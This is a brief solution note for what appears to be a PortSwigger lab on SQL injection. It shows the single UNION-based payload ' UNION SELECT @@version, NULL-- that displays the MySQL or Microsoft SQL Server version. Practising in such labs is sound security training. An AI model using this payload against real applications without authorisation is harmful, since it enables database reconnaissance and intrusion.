Port_Swigger_SQL injection attack, querying the database type and version on MySQL and Microsoft
SQL injection attack, querying the database type and version on MySQL and Microsoft¶
Solution¶
Display the database version¶
Payload: ' UNION SELECT @@version, NULL--